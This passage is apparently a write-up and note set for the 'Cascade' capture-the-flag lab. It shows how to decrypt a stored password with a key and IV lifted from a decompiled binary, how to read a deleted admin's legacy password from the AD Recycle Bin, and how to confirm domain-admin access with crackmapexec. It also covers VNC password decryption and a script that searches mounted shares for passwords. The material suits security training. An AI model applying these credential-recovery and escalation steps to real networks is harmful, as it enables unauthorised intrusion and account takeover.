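    """S-box = affine transform of the multiplicative inverse; inverse box by lookup."""
    inv = [0] * 256
    for x in range(1, 256):
        if not inv[x]:
            for y in range(1, 256):
                if _gmul(x, y) == 1:
                    inv[x], inv[y] = y, x
                    break
    sbox = []
    for x in range(256):
        b = r = inv[x]
        for _ in range(4):
            b = ((b << 1) | (b >> 7)) & 0xFF
            r ^= b
        sbox.append(r ^ 0x63)
    inv_sbox = [0] * 256
    for i, v in enumerate(sbox):
        inv_sbox[v] = i
    return sbox, inv_sbox

SBOX, INV_SBOX = _build_sboxes()

def expand_key(key):
    """AES-128 key schedule: 11 round keys of 16 bytes, column-major like the state."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]  # RotWord then SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]

def _inv_shift_rows(s):
    # state index = 4*column + row; row r is rotated right by r positions
    return [s[4 * ((c - r) % 4) + r] for c in range(4) for r in range(4)]

def _inv_mix_columns(s):
    out = []
    for c in range(4):
        a = s[4 * c:4 * c + 4]
        out += [
            _gmul(a[0], 14) ^ _gmul(a[1], 11) ^ _gmul(a[2], 13) ^ _gmul(a[3], 9),
            _gmul(a[0], 9) ^ _gmul(a[1], 14) ^ _gmul(a[2], 11) ^ _gmul(a[3], 13),
            _gmul(a[0], 13) ^ _gmul(a[1], 9) ^ _gmul(a[2], 14) ^ _gmul(a[3], 11),
            _gmul(a[0], 11) ^ _gmul(a[1], 13) ^ _gmul(a[2], 9) ^ _gmul(a[3], 14),
        ]
    return out

def decrypt_block(round_keys, block):
    s = [b ^ k for b, k in zip(block, round_keys[10])]
    for rnd in range(9, 0, -1):
        s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
        s = _inv_mix_columns([b ^ k for b, k in zip(s, round_keys[rnd])])
    s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
    return bytes(b ^ k for b, k in zip(s, round_keys[0]))

def aes128_cbc_decrypt(key, iv, data):
    if len(key) != 16 or len(iv) != 16 or len(data) % 16:
        raise ValueError("AES-128-CBC needs a 16-byte key, a 16-byte IV and whole blocks")
    rk, prev, out = expand_key(key), iv, bytearray()
    for i in range(0, len(data), 16):
        blk = data[i:i + 16]
        out += bytes(p ^ q for p, q in zip(decrypt_block(rk, blk), prev))
        prev = blk
    return bytes(out)

def pkcs7_unpad(data):
    n = data[-1]
    if not 1 <= n <= 16 or data[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS#7 padding: wrong key/IV or not this scheme")
    return data[:-n]

# Constants lifted from the decompiled CascCrypto.DecryptString.
DEFAULT_IV = b"1tdyjCbY1Ix49842"

def decrypt_string(encrypted_b64, key_str, iv=DEFAULT_IV):
    """Python equivalent of CascCrypto.DecryptString(EncryptedString, Key)."""
    ct = base64.b64decode(encrypted_b64)
    return pkcs7_unpad(aes128_cbc_decrypt(key_str.encode("utf-8"), iv, ct)).decode("utf-8")

if __name__ == "__main__":
    print(decrypt_string("BQO5l5Kj9MdErXx6Q6AGOw==", "c4scadek3y654321"))
```

A wrong key or IV surfaces here as a padding error rather than as silent garbage, which is the behaviour you want when trying several recovered constants against a database full of ciphertexts.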
AD Recycle Bin
The account is a member of the AD Recycle Bin group:
net user arksvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 4:18:20 PM
Password expires Never
Password changeable 1/9/2020 4:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/8/2024 6:55:12 AM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
Search: AD Recycle Bin privilege escalation
Domain Privilege Escalation - Offsec Journey
This group gives you permission to read deleted AD objects. Some juicy information can be found in there:
The Active Directory Recycle Bin is used to recover deleted Active Directory objects such as Users, Groups, OUs etc. The objects keep all their properties intact while in the AD Recycle Bin, which allows them to be restored at any point.
Get-ADObject
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
CanonicalName : cascade.local/Deleted Objects
CN : Deleted Objects
Created : 1/9/2020 3:31:39 PM
createTimeStamp : 1/9/2020 3:31:39 PM
Deleted : True
Description : Default container for deleted objects
DisplayName :
DistinguishedName : CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
instanceType : 4
isCriticalSystemObject : True
isDeleted : True
LastKnownParent :
Modified : 1/13/2020 1:21:17 AM
modifyTimeStamp : 1/13/2020 1:21:17 AM
Name : Deleted Objects
ObjectCategory : CN=Container,CN=Schema,CN=Configuration,DC=cascade,DC=local
ObjectClass : container
ObjectGUID : 51de9801-3625-4ac2-a605-d6bd71617681
ProtectedFromAccidentalDeletion :
sDRightsEffective : 0
showInAdvancedViewOnly : True
systemFlags : -1946157056
uSNChanged : 65585
uSNCreated : 5695
whenChanged : 1/13/2020 1:21:17 AM
whenCreated : 1/9/2020 3:31:39 PM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
CN : CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
codePage : 0
countryCode : 0
Created : 1/9/2020 7:30:19 PM
createTimeStamp : 1/9/2020 7:30:19 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM, 1/9/2020 7:30:19 PM, 1/1/1601 12:04:17 AM}
instanceType : 4
isCriticalSystemObject : False
isDeleted : True
LastKnownParent : OU=Computers,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
localPolicyFlags : 0
logonCount : 0
Modified : 1/28/2020 6:08:35 PM
modifyTimeStamp : 1/28/2020 6:08:35 PM
msDS-LastKnownRDN : CASC-WS1
Name : CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : computer
ObjectGUID : 6d97daa4-2e82-4946-a11e-f91fa18bfabe
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1108
primaryGroupID : 515
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132230718192147073
sAMAccountName : CASC-WS1$
sDRightsEffective : 0
userAccountControl : 4128
uSNChanged : 245849
uSNCreated : 24603
whenChanged : 1/28/2020 6:08:35 PM
whenCreated : 1/9/2020 7:30:19 PM
CanonicalName : cascade.local/Deleted Objects/Scheduled Tasks
DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
CN : Scheduled Tasks
DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
Created : 1/13/2020 5:21:53 PM
createTimeStamp : 1/13/2020 5:21:53 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=Scheduled Tasks\0ADEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/17/2020 9:35:46 PM, 1/17/2020 9:32:57 PM, 1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM...}
groupType : -2147483644
instanceType : 4
isDeleted : True
LastKnownParent : OU=Groups,OU=UK,DC=cascade,DC=local
Modified : 1/28/2020 6:07:55 PM
modifyTimeStamp : 1/28/2020 6:07:55 PM
msDS-LastKnownRDN : Scheduled Tasks
Name : Scheduled Tasks
DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : group
ObjectGUID : 13375728-5ddb-4137-b8b8-b9041d1d3fd2
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1131
ProtectedFromAccidentalDeletion : False
sAMAccountName : Scheduled Tasks
sDRightsEffective : 0
uSNChanged : 245848
uSNCreated : 114790
whenChanged : 1/28/2020 6:07:55 PM
whenCreated : 1/13/2020 5:21:53 PM
CanonicalName : cascade.local/Deleted Objects/{A403B701-A528-4685-A816-FDEE32BDDCBA}
DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
CN : {A403B701-A528-4685-A816-FDEE32BDDCBA}
DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
Created : 1/26/2020 2:34:30 AM
createTimeStamp : 1/26/2020 2:34:30 AM
Deleted : True
Description :
DisplayName : Block Potato
DistinguishedName : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
flags : 0
gPCFileSysPath : \\cascade.local\SysVol\cascade.local\Policies\{A403B701-A528-4685-A816-FDEE32BDDCBA}
gPCFunctionalityVersion : 2
gPCMachineExtensionNames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1D-2488-11D1-A28C-00C04FB94F17}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1D-2488-11D1-A28C-00C04FB94F17}]
instanceType : 4
isDeleted : True
LastKnownParent : CN=Policies,CN=System,DC=cascade,DC=local
Modified : 1/26/2020 2:40:52 AM
modifyTimeStamp : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN : {A403B701-A528-4685-A816-FDEE32BDDCBA}
Name : {A403B701-A528-4685-A816-FDEE32BDDCBA}
DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : groupPolicyContainer
ObjectGUID : ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196701
uSNCreated : 196688
versionNumber : 2
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:30 AM
CanonicalName : cascade.local/Deleted Objects/Machine
DEL:93c23674-e411-400b-bb9f-c0340bda5a34
CN : Machine
DEL:93c23674-e411-400b-bb9f-c0340bda5a34
Created : 1/26/2020 2:34:31 AM
createTimeStamp : 1/26/2020 2:34:31 AM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=Machine\0ADEL:93c23674-e411-400b-bb9f-c0340bda5a34,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
instanceType : 4
isDeleted : True
LastKnownParent : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Modified : 1/26/2020 2:40:52 AM
modifyTimeStamp : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN : Machine
Name : Machine
DEL:93c23674-e411-400b-bb9f-c0340bda5a34
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : container
ObjectGUID : 93c23674-e411-400b-bb9f-c0340bda5a34
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196699
uSNCreated : 196689
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:31 AM
CanonicalName : cascade.local/Deleted Objects/User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
CN : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
Created : 1/26/2020 2:34:31 AM
createTimeStamp : 1/26/2020 2:34:31 AM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
instanceType : 4
isDeleted : True
LastKnownParent : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Modified : 1/26/2020 2:40:52 AM
modifyTimeStamp : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN : User
Name : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : container
ObjectGUID : 746385f2-e3a0-4252-b83a-5a206da0ed88
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196700
uSNCreated : 196690
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:31 AM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : TempAdmin@cascade.local
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
cascadeLegacyPwd
The deleted TempAdmin object still carries a cascadeLegacyPwd attribute, and the meeting notes said TempAdmin's password was the same as the administrator's.
cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz
echo 'YmFDVDNyMWFOMDBkbGVz' | base64 -d
baCT3r1aN00dles
crackmapexec smb 10.10.10.182 -u administrator -p baCT3r1aN00dles
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\administrator:baCT3r1aN00dles (Pwn3d!)
Other
scriptPath: MapDataDrive.vbs
sudo apt install libhivex-bin
During the reversing step it is also possible to set a breakpoint in dnSpy right after the decrypt call and read the plaintext from the local, instead of re-implementing the routine.
Writeup
Standard SQL works in sqlite3:
select * from DeletedUserAudit;
select * from Ldap;
select * from Misc;
Decrypt VNC Password
echo '6bcf2a4b6e5aca0f' | xxd -r -p > vnc_enc_pass
/opt/vncpwd/vncpwd vnc_enc_pass
/opt/vncpwd/vncpwd <(echo '6bcf2a4b6e5aca0f' | xxd -r -p)
C# Online
Run the decrypt routine as a standalone C# program (any online C# compiler will do):
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

public class Program
{
    public static void Main()
    {
        // Ciphertext from the Ldap table in Audit.db, key literal from CascAudit.exe
        string str = DecryptString("BQO5l5Kj9MdErXx6Q6AGOw==", "c4scadek3y654321");
        Console.WriteLine(str);
    }

    // Same parameters as CascCrypto.DecryptString: AES-128-CBC, UTF-8 key and IV,
    // PKCS7 padding (the .NET default the decompiled code never states)
    public static string DecryptString(string EncryptedString, string Key)
    {
        byte[] buffer = Convert.FromBase64String(EncryptedString);
        using (Aes aes = Aes.Create())
        {
            aes.KeySize = 128;
            aes.BlockSize = 128;
            aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
            aes.Mode = CipherMode.CBC;
            aes.Key = Encoding.UTF8.GetBytes(Key);
            using (MemoryStream memoryStream = new MemoryStream(buffer))
            using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
            using (StreamReader reader = new StreamReader(cryptoStream, Encoding.UTF8))
            {
                // The original copies buffer.Length bytes into a fixed array, so the
                // returned string ends in NUL characters once padding is removed.
                // Reading the stream to its end returns exactly the plaintext.
                return reader.ReadToEnd();
            }
        }
    }
}
Breakpoint
smbclient -U 's.smith%sT333ve2' //10.10.10.182/Audit$
smb: \> mask
smb: \> mask ""
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
When debugging in dnSpy, start the process with the argument RunAudit.bat passes (the path to Audit.db); without it the code never reaches the decrypt call and the breakpoint is not hit.


AD Recycle Bin
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *
LDAP Search Tricks
Use grep to pick out dn lines that contain Users:
ldapsearch -x -H ldap://10.10.10.182 -b "dc=cascade,dc=local" | grep 'dn' | grep -i 'users'
Use that OU as the search base (-b) to pull only the user objects:
OU=Users,OU=UK,DC=cascade,DC=local

- grep notes
# grep has no AND operator for two patterns on one line; use awk, or chain the patterns
awk '/dn/ && /Users/ { print; }' ldap/ldapsearch.txt
awk '/dn/ && /Users/ { print; found = 1 } END { exit !found }' ldap/ldapsearch.txt
grep -e 'dn.*Users' -e 'Users.*dn' ldap/ldapsearch.txt
grep -e 'dn.*Users' ldap/ldapsearch.txt
regular expression - How to run grep with multiple AND patterns? - Unix & Linux Stack Exchange
linux - How to run multiple AND in grep command - Unix & Linux Stack Exchange
ArkAdRecycleBin.log
This log contains two more hints:
Running as user CASCADE\ArkSvc: the recycle-bin tool runs as ArkSvc, which is why that account ends up in the AD Recycle Bin group.
Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local: TempAdmin, whose password matched the domain administrator's, was moved to the Recycle Bin rather than purged, so ArkSvc can still read its attributes.
1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD] Validating settings...
1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD] Validating settings...
2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD] Validating settings...
8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0
CyberChef AES

mount and pwsh
Mount the share locally and search it with PowerShell rather than grep: some files on Windows shares are UTF-16 encoded, and a byte-oriented grep will miss text in them. PowerShell for Linux's Select-String decodes both UTF-8 and UTF-16 automatically.
sudo mount -t cifs -ousername=r.thompson -opassword=rY4n5eva //10.10.10.182/Data /mnt
get-childitem -recurse | select-string -pattern password
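An added example, not part of the writeup, of the encoding problem described above, in Python rather than PowerShell: a byte-oriented grep never matches "password" in a UTF-16LE file because every other byte is NUL, whereas decoding each file first (by BOM, or by the NUL-pattern heuristic for BOM-less UTF-16LE) finds the same string in all three files. The sample share tree, file names and contents are constructed for the demonstration.

```python
import os
import re
import tempfile

def decode_text(raw):
    """Decode file bytes as UTF-8 or UTF-16, which is what a byte grep cannot do.

    'password' in a UTF-16LE file is stored as p\\x00a\\x00s\\x00s\\x00..., so the
    ASCII pattern never occurs in the raw bytes.
    """
    if raw.startswith(b"\xff\xfe") or raw.startswith(b"\xfe\xff"):
        return raw.decode("utf-16")          # BOM present, endianness from BOM
    if raw.startswith(b"\xef\xbb\xbf"):
        return raw.decode("utf-8-sig")
    odd = raw[1::2][:64]                     # no BOM: UTF-16LE ASCII text has NUL in every odd byte
    if len(raw) >= 4 and odd.count(0) > len(odd) // 2:
        return raw.decode("utf-16-le", "replace")
    return raw.decode("utf-8", "replace")

def naive_byte_grep(root, pattern):
    """What `grep -ri` effectively does: match the pattern against raw bytes."""
    rx = re.compile(pattern.encode(), re.IGNORECASE)
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                if rx.search(fh.read()):
                    hits.append(os.path.relpath(path, root))
    return hits

def search_tree(root, pattern):
    """Return (relative path, line number, line) for every match after decoding."""
    rx = re.compile(pattern, re.IGNORECASE)
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                text = decode_text(fh.read())
            for lineno, line in enumerate(text.splitlines(), 1):
                if rx.search(line):
                    hits.append((os.path.relpath(path, root), lineno, line.strip()))
    return hits

def build_sample_share():
    """Constructed stand-in for the mounted Data share: one UTF-8 file, one UTF-16
    file with a BOM (what a PowerShell redirect on older Windows produces) and one
    BOM-less UTF-16LE file."""
    root = tempfile.mkdtemp(prefix="share_")
    os.makedirs(os.path.join(root, "IT", "Temp"))
    with open(os.path.join(root, "IT", "notes.txt"), "wb") as f:
        f.write("Meeting notes\nThe temp account password is set by IT\n".encode("utf-8"))
    with open(os.path.join(root, "IT", "Temp", "export.txt"), "wb") as f:
        f.write("Service account\r\nPassword=Summer2020\r\n".encode("utf-16"))
    with open(os.path.join(root, "IT", "Temp", "nobom.txt"), "wb") as f:
        f.write("legacy PASSWORD field\n".encode("utf-16-le"))
    return root

if __name__ == "__main__":
    share = build_sample_share()
    print("byte grep:", naive_byte_grep(share, "password"))
    for path, lineno, line in search_tree(share, "password"):
        print(f"{path}:{lineno}: {line}")
```

Point search_tree at the CIFS mount point (/mnt in the command above) to get the Select-String behaviour from a plain Python install; the heuristic in decode_text only looks at the first 64 bytes, which is enough for text files and cheap on large binaries.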